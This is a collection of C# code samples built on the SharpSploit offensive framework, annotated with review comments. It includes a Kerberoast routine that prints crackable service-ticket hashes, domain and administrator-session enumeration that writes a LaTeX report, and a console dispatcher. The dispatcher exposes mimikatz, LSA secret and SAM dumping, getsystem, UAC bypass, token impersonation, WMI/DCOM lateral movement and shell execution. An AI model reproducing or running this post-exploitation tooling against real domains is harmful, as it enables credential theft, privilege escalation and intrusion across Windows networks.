Exemplo n.º 1
        /// <summary>
        /// Runs the searcher's computer query and prints every returned directory object.
        /// </summary>
        /// <param name="searcher">Searcher to query. It is dereferenced without a null check.</param>
        /// <param name="target">Optional names forwarded unchanged to the query; null is passed through as-is.</param>
        private static void getDomainComputers(SharpSploit.Enumeration.Domain.DomainSearcher searcher, IEnumerable <string> target = null)
        {
            // NOTE(review): a null searcher raises NullReferenceException here; nothing in this
            // method reports the failure, so the caller has to handle it.
            List <SharpSploit.Enumeration.Domain.DomainObject> computers = searcher.GetDomainComputers(target);

            for (int i = 0; i < computers.Count; i++)
            {
                // Each object is rendered with its own ToString(); the format is defined by DomainObject.
                Console.WriteLine(computers[i].ToString());
            }
        }
Exemplo n.º 2
        /// <summary>
        /// Calls the searcher's Kerberoast query and prints the formatted hash of every returned ticket.
        /// </summary>
        /// <param name="searcher">Searcher to query. It is dereferenced without a null check.</param>
        /// <param name="target">Optional names forwarded unchanged to the query; null is passed through as-is.</param>
        private static void kerberoast(SharpSploit.Enumeration.Domain.DomainSearcher searcher, IEnumerable <string> target = null)
        {
            // NOTE(review): the printed values are crackable credential material for service
            // accounts; console output that is captured or logged must be treated as sensitive.
            // Presumably each entry corresponds to a Kerberos service-ticket request, which
            // domain controllers can audit (service ticket operations) - confirm against the library.
            List <SharpSploit.Enumeration.Domain.SPNTicket> tickets = searcher.Kerberoast(target);

            for (int i = 0; i < tickets.Count; i++)
            {
                Console.WriteLine(tickets[i].GetFormattedHash());
            }
        }
Exemplo n.º 3
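        /// <summary>
        /// Builds a DomainSearcher from command-line style tokens.
        /// </summary>
        /// <remarks>
        /// Recognised flags (matched case-insensitively): -username, -password, -domain, -server,
        /// -searchbase, -searchstring. Each flag's value is the token that follows it.
        /// Search scope, page size, time limit, tombstone and security masks are fixed defaults.
        /// </remarks>
        /// <param name="args">Tokens to scan; the original casing of values is preserved.</param>
        /// <returns>
        /// The configured searcher, or null when -username is given without -password or when
        /// any exception occurs (for example a flag that is the last token).
        /// </returns>
        private static SharpSploit.Enumeration.Domain.DomainSearcher searcherBuilder(string[] args)
        {
            try
            {
                SharpSploit.Enumeration.Domain.Credential creds = null;
                string domain = "", server = "", searchBase = "", searchString = "";
                System.DirectoryServices.SearchScope searchScope = System.DirectoryServices.SearchScope.Subtree;
                int      resultPageSize  = 200;
                TimeSpan serverTimeLimit = default(TimeSpan);
                bool     tombStone       = false;
                System.DirectoryServices.SecurityMasks securityMasks = 0;

                // Flags are located in the lower-cased copy and the value is read from the same
                // position in the original array. Looking the flag up in the original array with
                // a lower-case literal returned -1 for "-Username" and silently read args[0].
                string[] argsLower = args.Select(s => s.ToLowerInvariant()).ToArray();

                int usernameIndex = Array.IndexOf(argsLower, "-username");
                if (usernameIndex > -1)
                {
                    int passwordIndex = Array.IndexOf(argsLower, "-password");
                    if (passwordIndex > -1)
                    {
                        // The password is no longer echoed to the console: cleartext secrets in
                        // terminal scrollback or captured output are a credential leak.
                        creds = new SharpSploit.Enumeration.Domain.Credential(args[usernameIndex + 1], args[passwordIndex + 1]);
                    }
                    else
                    {
                        Console.WriteLine("Error, if providing credentials you must provide both a username and password");
                        return(null);
                    }
                }

                int domainIndex = Array.IndexOf(argsLower, "-domain");
                if (domainIndex > -1)
                {
                    domain = args[domainIndex + 1];
                }

                int serverIndex = Array.IndexOf(argsLower, "-server");
                if (serverIndex > -1)
                {
                    server = args[serverIndex + 1];
                }

                int searchBaseIndex = Array.IndexOf(argsLower, "-searchbase");
                if (searchBaseIndex > -1)
                {
                    searchBase = args[searchBaseIndex + 1];
                }

                int searchStringIndex = Array.IndexOf(argsLower, "-searchstring");
                if (searchStringIndex > -1)
                {
                    searchString = args[searchStringIndex + 1];
                }

                return(new SharpSploit.Enumeration.Domain.DomainSearcher(creds, domain, server, searchBase, searchString, searchScope, resultPageSize, serverTimeLimit, tombStone, securityMasks));
            }
            catch
            {
                // Deliberate best-effort: every failure (missing value after a flag, null args,
                // constructor errors) collapses into one message and a null result.
                // NOTE(review): the cause is discarded; callers only see null.
                Console.WriteLine("Error Generating Domain Searcher Object");
                return(null);
            }
        }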
Exemplo n.º 4
        /// <summary>
        /// Lists users flagged with admincount == "1" and, for each of them, reports the domain
        /// computers on which a logged-on session with the same user name is found.
        /// Results go to the console and to the <c>sw</c> writer.
        /// </summary>
        static void GetDomainAdministrators()
        {
            // NOTE(review): admincount == "1" is used as the "administrator" test. In Active
            // Directory that attribute marks accounts that are or once were in a protected group,
            // so it is a heuristic, not proof of current Domain Admins membership.
            Console.WriteLine("[*] Enumerating Administrators");
            Domain.DomainSearcher       adminSearcher = new Domain.DomainSearcher();
            IList <Domain.DomainObject> allUsers      = adminSearcher.GetDomainUsers(null);

            sw.WriteLine("Domain Administrators:");

            foreach (Domain.DomainObject user in allUsers)
            {
                // Skip anything that is not flagged, machine accounts ("$") and krbtgt.
                if (user.admincount != "1" || user.name.Contains("$") || user.name.Contains("krbtgt"))
                {
                    continue;
                }

                Console.WriteLine("[+] Found Domain Administrator: " + user.name.ToString());
                // NOTE(review): directory-supplied names are written into LaTeX output unescaped;
                // characters such as '_' or '&' will break or alter the generated report.
                sw.WriteLine("\\item " + user.name.ToString());

                // NOTE(review): the computer list is re-queried and every host is polled again for
                // each flagged user, so query volume grows with users x computers.
                SharpSploit.Enumeration.Domain.DomainSearcher      computerSearcher = new SharpSploit.Enumeration.Domain.DomainSearcher();
                List <SharpSploit.Enumeration.Domain.DomainObject> computers        = computerSearcher.GetDomainComputers();

                foreach (SharpSploit.Enumeration.Domain.DomainObject computer in computers)
                {
                    List <string> singleHost = new List <string> {
                        computer.name
                    };
                    List <Net.LoggedOnUser> AdministratorSessions = Net.GetNetLoggedOnUsers(singleHost);

                    foreach (var session in AdministratorSessions)
                    {
                        // Ignore machine accounts, then require an exact name match.
                        if (session.UserName.Contains("$"))
                        {
                            continue;
                        }
                        if (session.UserName != user.name)
                        {
                            continue;
                        }

                        string line = "[+] Found session on " + session.ComputerName + " for: " + session.UserName;
                        Console.WriteLine(line);
                        sw.WriteLine(line);
                    }
                }
            }
        }
Exemplo n.º 5
        }//End Main

        //SharpSploit Command Modules
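        /// <summary>
        /// Dispatches one tokenised console request to the matching handler.
        /// </summary>
        /// <remarks>
        /// request[0] is the command name, matched case-insensitively with invariant casing so
        /// the match does not depend on the process culture. The remaining tokens are passed to
        /// handlers that take arguments. Any exception raised while dispatching or inside a
        /// handler is swallowed and the string returned by ER() is printed instead.
        /// </remarks>
        /// <param name="request">Command name followed by its arguments.</param>
        private static void commands(string[] request)
        {
            String error = ER();

            try
            {
                SharpSploit.Enumeration.Domain.DomainSearcher searcher;
                IEnumerable <string> target;

                switch (request[0].ToLowerInvariant())
                {
                    //exit
                    case "exit":
                        return;

                    //help
                    case "help":
                    case "?":
                        help();
                        break;

                    //SharpSploit Credential Modules
                    case "mimi-all":
                        mimiAll();
                        break;
                    case "mimi-command":
                        mimiCommand(request);
                        break;
                    case "logonpasswords":
                        logonPasswords();
                        break;
                    case "lsacache":
                        lsaCache();
                        break;
                    case "lsasecrets":
                        lsaSecrets();
                        break;
                    case "samdump":
                        samDump();
                        break;
                    case "wdigest":
                        wDigest();
                        break;

                    //Token Class Begin
                    case "whoami":
                        WhoAmI();
                        break;
                    case "getsystem":
                        getSystem();
                        break;
                    case "impersonate":
                        impersonateProcess(request);
                        break;
                    case "bypassuac":
                        bypassUAC(request);
                        break;
                    case "reverttoself":
                        revertToSelf();
                        break;

                    //SharpSploit Enumeration Modules
                    // The searcher is built first and the optional -target value read second,
                    // the same order as before.
                    case "kerberoast":
                        searcher = searcherBuilder(request);
                        target   = parseTargetArgument(request);
                        if (target != null)
                        {
                            kerberoast(searcher, target);
                        }
                        else
                        {
                            kerberoast(searcher);
                        }
                        break;
                    case "getdomainusers":
                        searcher = searcherBuilder(request);
                        target   = parseTargetArgument(request);
                        if (target != null)
                        {
                            getDomainUsers(searcher, target);
                        }
                        else
                        {
                            getDomainUsers(searcher);
                        }
                        break;
                    case "getdomaingroups":
                        searcher = searcherBuilder(request);
                        target   = parseTargetArgument(request);
                        if (target != null)
                        {
                            getDomainGroups(searcher, target);
                        }
                        else
                        {
                            getDomainGroups(searcher);
                        }
                        break;
                    case "getdomaincomputers":
                        searcher = searcherBuilder(request);
                        target   = parseTargetArgument(request);
                        if (target != null)
                        {
                            getDomainComputers(searcher, target);
                        }
                        else
                        {
                            getDomainComputers(searcher);
                        }
                        break;
                    case "currentdirectory":
                        currentDirectory();
                        break;
                    case "directorylisting":
                        directoryListing();
                        break;
                    case "changedirectory":
                        changeDirectory(request);
                        break;
                    case "hostname":
                        hostname();
                        break;
                    case "processlist":
                        processList();
                        break;
                    case "procdump":
                        procDump(request);
                        break;
                    case "username":
                        username();
                        break;
                    case "readregistry":
                        readReg(request);
                        break;
                    case "writeregistry":
                        writeReg(request);
                        break;
                    case "netlocalgroupmembers":
                        netLocalGroupMembers(request);
                        break;
                    case "netlocalgroups":
                        netLocalGroups(request);
                        break;
                    case "netloggedonusers":
                        netLoggedOnUsers(request);
                        break;
                    case "netsessions":
                        netSessions(request);
                        break;
                    case "ping":
                        ping(request);
                        break;
                    case "portscan":
                        portScan(request);
                        break;

                    //SharpSploit Lateral Movement Modules
                    case "wmi":
                        wmi(request);
                        break;
                    case "dcom":
                        dcom(request);
                        break;

                    //SharpSploit Execution Modules
                    case "shell":
                        shell(request);
                        break;
                    case "powershell":
                        powerShell(request);
                        break;

                    //Unknown command
                    default:
                        Console.WriteLine("unknown command, type help for commandline options");
                        break;
                }
            }//End Try
            catch
            {
                // NOTE(review): the exception is discarded, so an empty request, a flag with no
                // value and a handler failure all print the same ER() text.
                Console.WriteLine(error);
            }
        }

        // Returns the token that follows "-target" as a one-element sequence, or null when the
        // flag is absent. The flag is located in a lower-cased copy and the value is read at that
        // same position; looking it up in the original array with a lower-case literal returned
        // -1 for "-Target" and made request[0] (the command name) the target.
        // A "-target" with no following token throws, which commands() reports through its catch.
        private static IEnumerable <string> parseTargetArgument(string[] request)
        {
            string[] argsLower  = request.Select(s => s.ToLowerInvariant()).ToArray();
            int      flagIndex  = Array.IndexOf(argsLower, "-target");

            if (flagIndex < 0)
            {
                return null;
            }
            return new String[] { request[flagIndex + 1] };
        }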
Exemplo n.º 6
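        /// <summary>
        /// Reports the computers treated as domain controllers and the user sessions found on
        /// each, then writes a follow-up item for checking SMB signing on those hosts.
        /// Output goes to the console and to the <c>sw</c> writer.
        /// </summary>
        static void GetDomainControllers()
        {
            Console.WriteLine("[*] Enumerating Domain Controllers and logged on User Sessions");
            Console.WriteLine("[*] Multiple Sessions of a single User on a Domain Controller possible");

            //Create Domain Searcher
            SharpSploit.Enumeration.Domain.DomainSearcher searcher = new SharpSploit.Enumeration.Domain.DomainSearcher();
            //Create list of Domain Computers
            List <SharpSploit.Enumeration.Domain.DomainObject> computers = searcher.GetDomainComputers();

            //Names of the hosts treated as Domain Controllers, reused for the follow-up line below
            List <String> DomainControllers = new List <string>();

            sw.WriteLine("Domain Controllers:");

            foreach (SharpSploit.Enumeration.Domain.DomainObject val in computers)
            {
                // NOTE(review): a host counts as a domain controller when its cn contains "DC".
                // That is a naming heuristic: it misses controllers named differently and
                // includes any workstation whose name happens to contain those letters.
                if (!val.cn.Contains("DC"))
                {
                    continue;
                }

                DomainControllers.Add(val.name.ToString());
                Console.WriteLine("[+] Found Domain Controller: " + val.name.ToString());

                // NOTE(review): directory-supplied names are written into LaTeX output unescaped;
                // characters such as '_' or '&' will break or alter the generated report.
                sw.WriteLine("\\item " + "\\textbf{" + val.name.ToString() + "}");

                List <Net.LoggedOnUser> users = Net.GetNetLoggedOnUsers(new List <string> {
                    val.name
                });

                sw.WriteLine("List of logged in Users on " + val.name + ":");
                foreach (var session in users)
                {
                    //filter out machine accounts (names containing "$")
                    if (!(session.UserName.Contains("$")))
                    {
                        Console.WriteLine("[+] Found user session on " + val.name + ": " + session.UserName);
                        // A space is required after \item; "\item" + name produced an undefined
                        // control sequence such as \itemalice in the report.
                        sw.WriteLine("\\item " + session.UserName);
                    }
                }
            }

            // Host names are joined with single spaces because they are appended to a command
            // line; the previous ", " separator left a trailing comma on every name but the last.
            string dc_hostnames = string.Join(" ", DomainControllers.ToArray());

            //create To Do for manual check of SMB signing
            Console.WriteLine("[+] To Do: manual Enumeration of SMB-Signing of the Domain Controllers");
            sw.WriteLine("To Do: Check if SMB-Signing enabled on the host:");
            // NOTE(review): the names come from the directory and are placed in a command string
            // verbatim; review the line before pasting it into a shell.
            sw.WriteLine("nmap -p137,139,445 --script smb-security-mode " + dc_hostnames);
        }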